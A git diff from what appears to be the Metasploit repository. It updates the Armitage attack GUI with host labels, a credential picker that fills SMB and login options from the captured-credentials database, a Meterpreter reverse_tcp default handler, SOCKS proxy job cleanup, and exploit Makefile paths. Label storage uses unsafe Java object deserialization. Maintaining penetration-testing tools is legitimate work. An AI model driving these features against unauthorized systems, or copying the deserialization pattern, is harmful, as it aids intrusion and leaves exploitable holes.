[$loader passObjects: $client, $mclient]; + [$loader passObjects: $client, $mclient, $lhost]; # don't make previous messages available... call($mclient, "armitage.skip"); diff --git a/external/source/armitage/scripts-cortana/internal.sl b/external/source/armitage/scripts-cortana/internal.sl index d434f920da..c83929a79c 100644 --- a/external/source/armitage/scripts-cortana/internal.sl +++ b/external/source/armitage/scripts-cortana/internal.sl @@ -9,7 +9,7 @@ import msf.*; # setg("varname", "value") sub setg { - call_async("core.setg", $1, $2); + cmd_safe("setg $1 $2"); } sub readg { @@ -335,14 +335,22 @@ sub multi_handler { } sub handler { - local('%o $3'); + local('%o $3 $key $value'); + + # default options + %o['PAYLOAD'] = $1; + %o['LPORT'] = $2; + %o['DisablePayloadHandler'] = 'false'; + %o['ExitOnSession'] = 'false'; + + # let the user override anything if ($3) { - %o = copy($3); + foreach $key => $value ($3) { + %o[$key] = $value; + } } - %o['PAYLOAD'] = "payload/ $+ $1"; - %o['LPORT'] = $2; - + # make sure LHOST is correct if ('LHOST' !in %o) { if ("*http*" iswm $1) { %o['LHOST'] = lhost(); @@ -352,6 +360,7 @@ sub handler { } } + # let's do it... return launch('exploit', 'multi/handler', %o); } diff --git a/external/source/armitage/scripts/armitage.sl b/external/source/armitage/scripts/armitage.sl index 2cf69a9a97..fe2af9a9ec 100644 --- a/external/source/armitage/scripts/armitage.sl +++ b/external/source/armitage/scripts/armitage.sl @@ -59,7 +59,7 @@ sub showHost { else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) { push(@overlay, 'resources/windowsxp.png'); } - else if ("*8*" iswm $match) { + else if ("*8*" iswm $match && "*2008*" !iswm $match) { push(@overlay, 'resources/windows8.png'); } else { @@ -139,7 +139,7 @@ sub _connectToMetasploit { $progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100]; # keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose. - $REMOTE = iff($1 eq "127.0.0.1", $null, 1); + $REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1); $flag = 10; while ($flag) { @@ -160,7 +160,7 @@ sub _connectToMetasploit { } # connecting locally? go to Metasploit directly... - if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") { + if ($REMOTE is $null) { $client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug]; $aclient = [new RpcAsync: $client]; $mclient = $client; @@ -239,10 +239,6 @@ sub _connectToMetasploit { [$progress setNote: "Connected: ..."]; [$progress setProgress: 60]; - if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') { - showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server."); - } - dispatchEvent(&postSetup); }, \$progress)); } diff --git a/external/source/armitage/scripts/attacks.sl b/external/source/armitage/scripts/attacks.sl index 4940fb4474..9fa13c9902 100644 --- a/external/source/armitage/scripts/attacks.sl +++ b/external/source/armitage/scripts/attacks.sl @@ -679,12 +679,20 @@ sub addFileListener { $actions["SigningCert"] = $actions["*FILE*"]; $actions["SigningKey"] = $actions["*FILE*"]; $actions["Wordlist"] = $actions["*FILE*"]; + $actions["EXE::Custom"] = $actions["*FILE*"]; + $actions["EXE::Template"] = $actions["*FILE*"]; $actions["WORDLIST"] = $actions["*FILE*"]; $actions["REXE"] = $actions["*FILE*"]; # set up an action to choose a session $actions["SESSION"] = lambda(&chooseSession); + # helpers to set credential pairs from database... yay? + $actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["PASSWORD"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD"); + $actions["SMBUser"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + $actions["SMBPass"] = lambda(&credentialHelper, \$model, $USER => "SMBUser", $PASS => "SMBPass"); + # set up an action to pop up a file chooser for different file type values. $actions["RHOST"] = { local('$title $temp'); diff --git a/external/source/armitage/scripts/gui.sl b/external/source/armitage/scripts/gui.sl index da5f974c10..7f7f155f88 100644 --- a/external/source/armitage/scripts/gui.sl +++ b/external/source/armitage/scripts/gui.sl @@ -446,7 +446,7 @@ sub quickListDialog { $button = [new JButton: $2]; [$button addActionListener: lambda({ - [$callback : [$model getSelectedValueFromColumn: $table, $lead]]; + [$callback : [$model getSelectedValueFromColumn: $table, $lead], $table, $model]; [$dialog setVisible: 0]; }, \$dialog, $callback => $5, \$model, \$table, $lead => $3[0])]; diff --git a/external/source/armitage/scripts/jobs.sl b/external/source/armitage/scripts/jobs.sl index fc30868be7..603f8ccf1b 100644 --- a/external/source/armitage/scripts/jobs.sl +++ b/external/source/armitage/scripts/jobs.sl @@ -16,47 +16,7 @@ import java.awt.event.*; import ui.*; sub manage_proxy_server { - manage_job("Auxiliary: server/socks4a", - # start server function - { - launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", $null); - }, - # description of job (for job kill function) - { - local('$host $port'); - ($host, $port) = values($2["datastore"], @("SRVHOST", "SRVPORT")); - return "SOCKS proxy is running on $host $+ : $+ $port $+ .\nWould you like to stop it?"; - } - ); - -} - -sub report_url { - find_job($name, { - if ($1 == -1) { - showError("Server not found"); - } - else { - local('$job $host $port $uripath'); - $job = call($client, "job.info", $1); - - ($host, $port) = values($job["info"]["datastore"], @("SRVHOST", "SRVPORT")); - $uripath = $job["info"]["uripath"]; - - local('$dialog $text $ok'); - $dialog = dialog("Output", 320, 240); - $text = [new JTextArea]; - [$text setText: "http:// $+ $host $+ : $+ $port $+ $uripath"]; - - $button = [new JButton: "Ok"]; - [$button addActionListener: lambda({ [$dialog setVisible: 0]; }, \$dialog)]; - - [$dialog add: [new JScrollPane: $text], [BorderLayout CENTER]]; - [$dialog add: center($button), [BorderLayout SOUTH]]; - - [$dialog setVisible: 1]; - } - }); + launch_dialog("SOCKS Proxy", "auxiliary", "server/socks4a", 1); } sub find_job { @@ -80,26 +40,6 @@ sub find_job { }, $name => $1, $function => $2)); } -# manage_job(job name, { start job function }, { job dialog info }) -sub manage_job { - local('$name $startf $stopf'); - ($name, $startf, $stopf) = @_; - - find_job($name, lambda({ - if ($1 == -1) { - [$startf]; - } - else { - local('$job $confirm $foo $confirm'); - $job = call($client, "job.info", $1); - $confirm = askYesNo([$stopf : $1, $job], "Stop Job"); - if ($confirm eq "0") { - call_async($client, "job.stop", $1); - } - } - }, \$startf, \$stopf)); -} - sub generatePayload { local('$file'); $file = saveFile2(); @@ -450,6 +390,11 @@ sub _launch_dialog { elog("launched DNS enum for $domain"); } } + else if ($type eq "auxiliary" && $command eq "server/socks4a") { + local('$host $port'); + ($host, $port) = values($options, @('SRVHOST', 'SRVPORT')); + elog("started SOCKS proxy server at $host $+ : $+ $port"); + } launch_service($title, "$type $+ / $+ $command", $options, $type, $format => [$combo getSelectedItem]); } diff --git a/external/source/armitage/scripts/menus.sl b/external/source/armitage/scripts/menus.sl index 7c70ba2d62..59cd3c5143 100644 --- a/external/source/armitage/scripts/menus.sl +++ b/external/source/armitage/scripts/menus.sl @@ -54,6 +54,29 @@ sub host_selected_items { item($i, '3. Vista/7', '3', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "Vista")); item($i, '4. 8/RT', '4', setHostValueFunction($2, "os_name", "Microsoft Windows", "os_flavor", "8")); + item($h, "Set Label...", 'S', lambda({ + # calculate preexisting label to prompt with + local('$label %l $host'); + + # get a label + foreach $host ($hosts) { + if ($label eq "") { + $label = getHostLabel($host); + } + } + + # ask for a label + $label = ask("Set label to:", $label); + if ($label !is $null) { + foreach $host ($hosts) { + %l[$host] = ["$label" trim]; + } + call_async($mclient, "db.report_labels", %l); + } + }, $hosts => $2)); + + separator($h); + item($h, "Remove Host", 'R', clearHostFunction($2)); } diff --git a/external/source/armitage/scripts/passhash.sl b/external/source/armitage/scripts/passhash.sl index 19feb846c3..ad9f68ce6a 100644 --- a/external/source/armitage/scripts/passhash.sl +++ b/external/source/armitage/scripts/passhash.sl @@ -372,3 +372,34 @@ sub launchBruteForce { [$console start]; }, $type => $1, $module => $2, $options => $3, $title => $4)); } + +sub credentialHelper { + thread(lambda({ + [Thread yield]; + + # gather our credentials please + local('$creds $cred @creds'); + $creds = call($mclient, "db.creds2", [new HashMap])["creds2"]; + foreach $cred ($creds) { + if ($PASS eq "SMBPass" || $cred['ptype'] ne "smb_hash") { + push(@creds, $cred); + } + } + + # pop up a dialog to let the user choose their favorite set + quickListDialog("Choose credentials", "Select", @("user", "user", "pass", "host"), @creds, $width => 640, $height => 240, lambda({ + if ($1 eq "") { + return; + } + + local('$user $pass'); + $user = [$3 getSelectedValueFromColumn: $2, 'user']; + $pass = [$3 getSelectedValueFromColumn: $2, 'pass']; + + [$model setValueForKey: $USER, "Value", $user]; + [$model setValueForKey: $PASS, "Value", $pass]; + [$model fireListeners]; + }, \$callback, \$model, \$USER, \$PASS)); + }, \$USER, \$PASS, \$model, $callback => $4)); +} + diff --git a/external/source/armitage/scripts/server.sl b/external/source/armitage/scripts/server.sl index 78f9738dbb..1ea04e9671 100644 --- a/external/source/armitage/scripts/server.sl +++ b/external/source/armitage/scripts/server.sl @@ -403,9 +403,6 @@ sub main { # we need this global to be set so our reverse listeners work as expected. $MY_ADDRESS = $host; - # make sure clients know a team server is present. can't happen async. - call($client, "core.setg", "ARMITAGE_TEAM", '1'); - # # setup the client cache # diff --git a/external/source/armitage/scripts/targets.sl b/external/source/armitage/scripts/targets.sl index 7929dac696..3721006ea7 100644 --- a/external/source/armitage/scripts/targets.sl +++ b/external/source/armitage/scripts/targets.sl @@ -21,6 +21,10 @@ sub getHostOS { return iff($1 in %hosts, %hosts[$1]['os_name'], $null); } +sub getHostLabel { + return iff($1 in %hosts, %hosts[$1]['label'], $null); +} + sub getSessions { return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']); } @@ -122,7 +126,7 @@ on sessions { } if ($host['show'] eq "1") { - push(@nodes, @($id, describeHost($host), showHost($host), $tooltip)); + push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip)); } } @@ -130,14 +134,14 @@ on sessions { } sub refreshGraph { - local('$node $id $description $icons $tooltip $highlight'); + local('$node $id $label $description $icons $tooltip $highlight'); # update everything... [$graph start]; # do the hosts? foreach $node (@nodes) { - ($id, $description, $icons, $tooltip) = $node; - [$graph addNode: $id, $description, $icons, $tooltip]; + ($id, $label, $description, $icons, $tooltip) = $node; + [$graph addNode: $id, $label, $description, $icons, $tooltip]; } # update the routes diff --git a/external/source/armitage/scripts/util.sl b/external/source/armitage/scripts/util.sl index ceed745950..de80e1d8d3 100644 --- a/external/source/armitage/scripts/util.sl +++ b/external/source/armitage/scripts/util.sl @@ -159,12 +159,15 @@ sub setg { } sub createDefaultHandler { - warn("Creating a default reverse handler..."); # setup a handler for meterpreter - setg("LPORT", randomPort()); + local('$port'); + $port = randomPort(); + setg("LPORT", $port); + warn("Creating a default reverse handler... 0.0.0.0: $+ $port"); call_async($client, "module.execute", "exploit", "multi/handler", %( PAYLOAD => "windows/meterpreter/reverse_tcp", LHOST => "0.0.0.0", + LPORT => $port, ExitOnSession => "false" )); } @@ -307,7 +310,12 @@ sub startMetasploit { savePreferences(); } - $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + if ("*apps*pro*" iswm $msfdir) { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null]; + } + else { + $handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null]; + } $data = join("\r\n", readAll($handle, -1)); closef($handle); @@ -416,7 +424,7 @@ sub connectDialog { [$dialog setVisible: 0]; connectToMetasploit($h, $p, $u, $s); - if ($h eq "127.0.0.1" || $h eq "localhost") { + if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") { try { closef(connect("127.0.0.1", $p, 1000)); } diff --git a/external/source/armitage/scripts/workspaces.sl b/external/source/armitage/scripts/workspaces.sl index 90c1210b50..5a45900654 100644 --- a/external/source/armitage/scripts/workspaces.sl +++ b/external/source/armitage/scripts/workspaces.sl @@ -33,7 +33,7 @@ sub listWorkspaces { $dialog = [new JPanel]; [$dialog setLayout: [new BorderLayout]]; - ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @()); + ($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @()); updateWorkspaceList($table, $model); [$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]]; @@ -88,15 +88,16 @@ sub workspaceDialog { local('$table $model'); ($table, $model) = $2; - local('$dialog $name $host $ports $os $button $session'); + local('$dialog $name $host $ports $os $button $session $label'); $dialog = dialog($title, 640, 480); - [$dialog setLayout: [new GridLayout: 6, 1]]; + [$dialog setLayout: [new GridLayout: 7, 1]]; $name = [new ATextField: $1['name'], 16]; [$name setEnabled: $enable]; $host = [new ATextField: $1['hosts'], 16]; $ports = [new ATextField: $1['ports'], 16]; $os = [new ATextField: $1['os'], 16]; + $label = [new ATextField: $1['labels'], 16]; $session = [new JCheckBox: "Hosts with sessions only"]; if ($1['session'] eq 1) { [$session setSelected: 1]; @@ -108,6 +109,7 @@ sub workspaceDialog { [$dialog add: label_for("Hosts:", 60, $host)]; [$dialog add: label_for("Ports:", 60, $ports)]; [$dialog add: label_for("OS:", 60, $os)]; + [$dialog add: label_for("Labels:", 60, $label)]; [$dialog add: $session]; [$dialog add: center($button)]; @@ -116,15 +118,16 @@ sub workspaceDialog { [$button addActionListener: lambda({ # yay, we have a dialog... - local('$n $h $p $o $s @workspaces $ws $temp'); + local('$n $h $p $o $s $l @workspaces $ws $temp'); $n = [[$name getText] trim]; $h = [strrep([$host getText], '*', '%', '?', '_') trim]; $p = [[$ports getText] trim]; $o = [strrep([$os getText], '*', '%', '?', '_') trim]; + $l = [[$label getText] trim]; $s = [$session isSelected]; # save the new menu - $ws = workspace($n, $h, $p, $o, $s); + $ws = workspace($n, $h, $p, $o, $s, $l); @workspaces = workspaces(); foreach $temp (@workspaces) { if ($temp["name"] eq $n) { @@ -140,7 +143,7 @@ sub workspaceDialog { updateWorkspaceList($table, $model); [$dialog setVisible: 0]; - }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)]; + }, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)]; } sub reset_workspace { @@ -199,16 +202,16 @@ sub set_workspace { } sub workspace { - return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5); + return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6); } sub workspaces { - local('$ws @r $name $host $port $os $session $workspace'); + local('$ws @r $name $host $port $os $session $workspace $label'); $ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]); foreach $workspace ($ws) { if ($workspace ne "") { - ($name, $host, $port, $os, $session) = split('@@', $workspace); - push(@r, workspace($name, $host, $port, $os, $session)); + ($name, $host, $port, $os, $session, $label) = split('@@', $workspace); + push(@r, workspace($name, $host, $port, $os, $session, $label)); } } return @r; diff --git a/external/source/armitage/src/armitage/ArmitageApplication.java b/external/source/armitage/src/armitage/ArmitageApplication.java index aec7602dd0..b7365e1309 100644 --- a/external/source/armitage/src/armitage/ArmitageApplication.java +++ b/external/source/armitage/src/armitage/ArmitageApplication.java @@ -196,6 +196,7 @@ public class ArmitageApplication extends JFrame { r.setLayout(new BorderLayout()); r.add(t.component, BorderLayout.CENTER); r.pack(); + t.component.validate(); r.addWindowListener(new WindowAdapter() { public void windowClosing(WindowEvent ev) { diff --git a/external/source/armitage/src/cortana/Loader.java b/external/source/armitage/src/cortana/Loader.java index a0a8a8c3c0..d5c76d836d 100644 --- a/external/source/armitage/src/cortana/Loader.java +++ b/external/source/armitage/src/cortana/Loader.java @@ -15,7 +15,7 @@ public class Loader implements Loadable { protected ScriptLoader loader; protected Hashtable shared = new Hashtable(); protected ScriptVariables vars = new ScriptVariables(); - protected Object[] passMe = new Object[2]; + protected Object[] passMe = new Object[3]; protected List scripts = new LinkedList(); public void unsetDebugLevel(int flag) { @@ -51,10 +51,11 @@ public class Loader implements Loadable { } } - public void passObjects(Object o, Object p) { + public void passObjects(Object o, Object p, Object q) { synchronized (this) { passMe[0] = o; passMe[1] = p; + passMe[2] = q; } } diff --git a/external/source/armitage/src/cortana/Main.java b/external/source/armitage/src/cortana/Main.java index be70944f5d..be04c511a3 100644 --- a/external/source/armitage/src/cortana/Main.java +++ b/external/source/armitage/src/cortana/Main.java @@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener { try { Object conns[] = setupConnections(host, port, user, pass, nick); //new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false); - engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host); + engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]); new Thread(this).start(); } catch (java.lang.RuntimeException rex) { diff --git a/external/source/armitage/src/graph/NetworkGraph.java b/external/source/armitage/src/graph/NetworkGraph.java index fa9b0e7eef..d15d67b3ac 100644 --- a/external/source/armitage/src/graph/NetworkGraph.java +++ b/external/source/armitage/src/graph/NetworkGraph.java @@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener { protected Map tooltips = new HashMap(); - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { nodeImages.put(id, image); + if (label.length() > 0) { + if (description.length() > 0) { + description += "\n" + label; + } + else { + description = label; + } + } + mxCell cell; if (!nodes.containsKey(id)) { - cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97); + cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97); nodes.put(id, cell); } else { cell = (mxCell)nodes.get(id); - cell.setValue(label); + cell.setValue(description); } nodes.touch(id); diff --git a/external/source/armitage/src/msf/DatabaseImpl.java b/external/source/armitage/src/msf/DatabaseImpl.java index ba7b330d59..ff00d4d877 100644 --- a/external/source/armitage/src/msf/DatabaseImpl.java +++ b/external/source/armitage/src/msf/DatabaseImpl.java @@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection { protected String workspaceid = "0"; protected String hFilter = null; protected String sFilter = null; + protected String[] lFilter = null; protected Route[] rFilter = null; protected String[] oFilter = null; protected int hindex = 0; protected int sindex = 0; + /* keep track of labels associated with each host */ + protected Map labels = new HashMap(); + /* define the maximum hosts in a workspace */ protected int maxhosts = 512; @@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection { return false; } + private boolean checkLabel(String host) { + if (!labels.containsKey(host)) + return false; + + String label_l = (labels.get(host) + "").toLowerCase(); + + for (int x = 0; x < lFilter.length; x++) { + if (label_l.indexOf(lFilter[x]) != -1) { + return true; + } + } + return false; + } + private boolean checkOS(String os) { String os_l = os.toLowerCase(); @@ -145,11 +163,76 @@ public class DatabaseImpl implements RpcConnection { return false; } + protected void loadLabels() { + try { + /* query database for label data */ + List rows = executeQuery("SELECT DISTINCT data FROM notes WHERE ntype = 'armitage.labels'"); + if (rows.size() == 0) + return; + + /* extract our BASE64 encoded data */ + String data = ((Map)rows.get(0)).get("data") + ""; + System.err.println("Read: " + data.length() + " bytes"); + + /* turn our data into raw data */ + byte[] raw = Base64.decode(data); + + /* deserialize our notes data */ + ByteArrayInputStream store = new ByteArrayInputStream(raw); + ObjectInputStream handle = new ObjectInputStream(store); + Map temp = (Map)(handle.readObject()); + handle.close(); + store.close(); + + /* merge with our new map */ + labels.putAll(temp); + } + catch (Exception ex) { + ex.printStackTrace(); + } + } + + protected void mergeLabels(Map l) { + /* accept any label values and merge them into our global data set */ + Iterator i = l.entrySet().iterator(); + while (i.hasNext()) { + Map.Entry entry = (Map.Entry)i.next(); + if ("".equals(entry.getValue())) { + labels.remove(entry.getKey() + ""); + } + else { + labels.put(entry.getKey() + "", entry.getValue() + ""); + } + } + } + + /* add labels to our hosts */ + public List addLabels(List rows) { + if (labels.size() == 0) + return rows; + + Iterator i = rows.iterator(); + while (i.hasNext()) { + Map entry = (Map)i.next(); + String address = (entry.containsKey("address") ? entry.get("address") : entry.get("host")) + ""; + if (labels.containsKey(address)) { + entry.put("label", labels.get(address) + ""); + } + else { + entry.put("label", ""); + } + } + + return rows; + } + public List filterByRoute(List rows, int max) { - if (rFilter != null || oFilter != null) { + if (rFilter != null || oFilter != null || lFilter != null) { Iterator i = rows.iterator(); while (i.hasNext()) { Map entry = (Map)i.next(); + + /* make sure the address is within a route we care about */ if (rFilter != null && entry.containsKey("address")) { if (!checkRoute(entry.get("address") + "")) { i.remove(); @@ -163,9 +246,26 @@ public class DatabaseImpl implements RpcConnection { } } + /* make sure the host is something we care about too */ if (oFilter != null && entry.containsKey("os_name")) { - if (!checkOS(entry.get("os_name") + "")) + if (!checkOS(entry.get("os_name") + "")) { i.remove(); + continue; + } + } + + /* make sure the host has the right label */ + if (lFilter != null && entry.containsKey("address")) { + if (!checkLabel(entry.get("address") + "")) { + i.remove(); + continue; + } + } + else if (lFilter != null && entry.containsKey("host")) { + if (!checkLabel(entry.get("host") + "")) { + i.remove(); + continue; + } } } @@ -180,6 +280,7 @@ public class DatabaseImpl implements RpcConnection { public void connect(String dbstring, String user, String password) throws Exception { db = DriverManager.getConnection(dbstring, user, password); setWorkspace("default"); + loadLabels(); } public Object execute(String methodName) throws IOException { @@ -192,8 +293,8 @@ public class DatabaseImpl implements RpcConnection { /* this is an optimization. If we have a network or OS filter, we need to pull back all host/service records and filter them here. If we do not have these types of filters, then we can let the database do the heavy lifting and limit the size of the final result there. */ - int limit1 = rFilter == null && oFilter == null ? maxhosts : 30000; - int limit2 = rFilter == null && oFilter == null ? maxservices : 100000; + int limit1 = rFilter == null && oFilter == null && lFilter == null ? maxhosts : 30000; + int limit2 = rFilter == null && oFilter == null && lFilter == null ? maxservices : 100000; temp.put("db.creds", "SELECT DISTINCT creds.*, hosts.address as host, services.name as sname, services.port as port, services.proto as proto FROM creds, services, hosts WHERE services.id = creds.service_id AND hosts.id = services.host_id AND hosts.workspace_id = " + workspaceid); @@ -235,7 +336,7 @@ public class DatabaseImpl implements RpcConnection { result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxservices)); } else if (methodName.equals("db.hosts")) { - result.put(methodName.substring(3), filterByRoute(executeQuery(query), maxhosts)); + result.put(methodName.substring(3), addLabels(filterByRoute(executeQuery(query), maxhosts))); } else { result.put(methodName.substring(3), executeQuery(query)); @@ -332,6 +433,7 @@ public class DatabaseImpl implements RpcConnection { rFilter = null; oFilter = null; + lFilter = null; List hosts = new LinkedList(); List srvcs = new LinkedList(); @@ -385,6 +487,11 @@ public class DatabaseImpl implements RpcConnection { oFilter = (values.get("os") + "").toLowerCase().split(",\\s*"); } + /* label filter */ + if (values.containsKey("labels") && (values.get("labels") + "").length() > 0) { + lFilter = (values.get("labels") + "").toLowerCase().split(",\\s*"); + } + if (hosts.size() == 0) { hFilter = null; } @@ -406,6 +513,31 @@ public class DatabaseImpl implements RpcConnection { result.put("rows", new Integer(stmt.executeUpdate())); return result; } + else if (methodName.equals("db.report_labels")) { + /* merge out global label data */ + Map values = (Map)params[0]; + mergeLabels(values); + + /* delete our saved label data */ + executeUpdate("DELETE FROM notes WHERE notes.ntype = 'armitage.labels'"); + + /* serialize our notes data */ + ByteArrayOutputStream store = new ByteArrayOutputStream(labels.size() * 128); + ObjectOutputStream handle = new ObjectOutputStream(store); + handle.writeObject(labels); + handle.close(); + store.close(); + + String data = Base64.encode(store.toByteArray()); + + /* save our label data */ + PreparedStatement stmt = null; + stmt = db.prepareStatement("INSERT INTO notes (ntype, data) VALUES ('armitage.labels', ?)"); + stmt.setString(1, data); + stmt.executeUpdate(); + + return new HashMap(); + } else if (methodName.equals("db.report_host")) { Map values = (Map)params[0]; String host = values.get("host") + ""; diff --git a/external/source/armitage/src/msf/RpcCacheImpl.java b/external/source/armitage/src/msf/RpcCacheImpl.java index c28e037e91..4a1d7e85cb 100644 --- a/external/source/armitage/src/msf/RpcCacheImpl.java +++ b/external/source/armitage/src/msf/RpcCacheImpl.java @@ -106,6 +106,8 @@ public class RpcCacheImpl implements Runnable { key.append(temp.get("ports")); key.append(";"); key.append(temp.get("session")); + key.append(";"); + key.append(temp.get("labels")); return key.toString(); } diff --git a/external/source/armitage/src/table/NetworkTable.java b/external/source/armitage/src/table/NetworkTable.java index 014fed3a10..2d7590db0e 100644 --- a/external/source/armitage/src/table/NetworkTable.java +++ b/external/source/armitage/src/table/NetworkTable.java @@ -52,7 +52,7 @@ public class NetworkTable extends JComponent implements ActionListener { public NetworkTable(Properties display) { this.display = display; - model = new GenericTableModel(new String[] { " ", "Address", "Description", "Pivot" }, "Address", 256); + model = new GenericTableModel(new String[] { " ", "Address", "Label", "Description", "Pivot" }, "Address", 256); table = new ATable(model); TableRowSorter sorter = new TableRowSorter(model); sorter.toggleSortOrder(1); @@ -79,12 +79,13 @@ public class NetworkTable extends JComponent implements ActionListener { }; sorter.setComparator(1, hostCompare); - sorter.setComparator(3, hostCompare); + sorter.setComparator(4, hostCompare); table.setRowSorter(sorter); table.setColumnSelectionAllowed(false); table.getColumn("Address").setPreferredWidth(125); + table.getColumn("Label").setPreferredWidth(125); table.getColumn("Pivot").setPreferredWidth(125); table.getColumn(" ").setPreferredWidth(32); table.getColumn(" ").setMaxWidth(32); @@ -95,7 +96,7 @@ public class NetworkTable extends JComponent implements ActionListener { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int col) { JLabel component = (JLabel)parent.getTableCellRendererComponent(table, value, isSelected, false, row, col); - if (col == 3 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { + if (col == 4 && Boolean.TRUE.equals(model.getValueAt(table, row, "Active"))) { component.setFont(component.getFont().deriveFont(Font.BOLD)); } else if (col == 1 && !"".equals(model.getValueAt(table, row, "Description"))) { @@ -252,16 +253,17 @@ public class NetworkTable extends JComponent implements ActionListener { public void addActionForKeySetting(String key, String dvalue, Action action) { } - public Object addNode(String id, String label, Image image, String tooltip) { + public Object addNode(String id, String label, String description, Image image, String tooltip) { if (id == null || label == null) return null; HashMap map = new HashMap(); map.put("Address", id); - if (label.indexOf(id) > -1) - label = label.substring(id.length()); - map.put("Description", label); + if (description.indexOf(id) > -1) + description = description.substring(id.length()); + map.put("Label", label); + map.put("Description", description); map.put("Tooltip", tooltip); map.put("Image", image); map.put(" ", tooltip); diff --git a/external/source/armitage/src/ui/ATable.java b/external/source/armitage/src/ui/ATable.java index bc1569659c..ce80216dbd 100644 --- a/external/source/armitage/src/ui/ATable.java +++ b/external/source/armitage/src/ui/ATable.java @@ -26,6 +26,12 @@ public class ATable extends JTable { specialitems.add("WORDLIST"); specialitems.add("SESSION"); specialitems.add("REXE"); + specialitems.add("EXE::Custom"); + specialitems.add("EXE::Template"); + specialitems.add("USERNAME"); + specialitems.add("PASSWORD"); + specialitems.add("SMBUser"); + specialitems.add("SMBPass"); return new TableCellRenderer() { public Component getTableCellRendererComponent(JTable table, Object value, boolean isSelected, boolean hasFocus, int row, int column) { diff --git a/external/source/armitage/src/ui/ZoomableImage.java b/external/source/armitage/src/ui/ZoomableImage.java index 346438e15e..466f2c56d3 100644 --- a/external/source/armitage/src/ui/ZoomableImage.java +++ b/external/source/armitage/src/ui/ZoomableImage.java @@ -54,6 +54,8 @@ public class ZoomableImage extends JLabel { check(ev); } }); + + setHorizontalAlignment(SwingConstants.CENTER); } protected void updateIcon() { diff --git a/external/source/armitage/whatsnew.txt b/external/source/armitage/whatsnew.txt index 5ea39884dd..c1e03e579b 100644 --- a/external/source/armitage/whatsnew.txt +++ b/external/source/armitage/whatsnew.txt @@ -1,6 +1,32 @@ Armitage Changelog ================== +23 Jan 13 (tested against msf 16351) +--------- +- Added helpers to set EXE::Custom and EXE::Template options. +- Fixed a bug displaying a Windows 8 icon for Windows 2008 hosts +- Cleaned up Armitage -> SOCKS Proxy job management code. The code to + check if a proxy server is up was deadlock prone. Removed it. +- Starting SOCKS Proxy module now opens a tab displaying the module + start process. An event is posted to the event log too. +- Created an option helper to select credentials for SMBUser, SMBPass, + USERNAME, and PASSWORD. +- Added a feature to label hosts. A label will show up in its own column + in table view or below all info in graph view. Any team member may + change a label through [host] -> host -> Set Label. You may also use + dynamic workspaces to show hosts with certain labels attached. +- Fixed bad things happening when connecting Armitage to 'localhost' and + not '127.0.0.1'. +- Screenshots and Webcam shots are now centered in their tab. +- Added an alternate .bat file to start msfrpcd on Windows in the + Metasploit 4.5 installer's environment. +- Added a color-style for [!] warning messages + +Cortana Updates (for scripters) +-------- +- &handler function now works as advertised. +- Cortana now avoids use of core.setg + 4 Jan 13 (tested against msf 16252) -------- - Added a helper to set REXE option diff --git a/external/source/exploits/cve-2012-5076_2/Makefile b/external/source/exploits/cve-2012-5076_2/Makefile index e93911b8ed..1a84229b80 100755 --- a/external/source/exploits/cve-2012-5076_2/Makefile +++ b/external/source/exploits/cve-2012-5076_2/Makefile @@ -11,8 +11,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class ../../../../data/exploits/cve-2013-0422/ - mv B.class ../../../../data/exploits/cve-2013-0422/ + mv Exploit.class ../../../../data/exploits/cve-2012-5076_2/ + mv B.class ../../../../data/exploits/cve-2012-5076_2/ clean: rm -rf *.class diff --git a/external/source/exploits/cve-2012-5088/Makefile b/external/source/exploits/cve-2012-5088/Makefile index abc39b7a2c..226cdcd65c 100755 --- a/external/source/exploits/cve-2012-5088/Makefile +++ b/external/source/exploits/cve-2012-5088/Makefile @@ -9,8 +9,8 @@ CLASSES = \ all: $(CLASSES:.java=.class) install: - mv Exploit.class 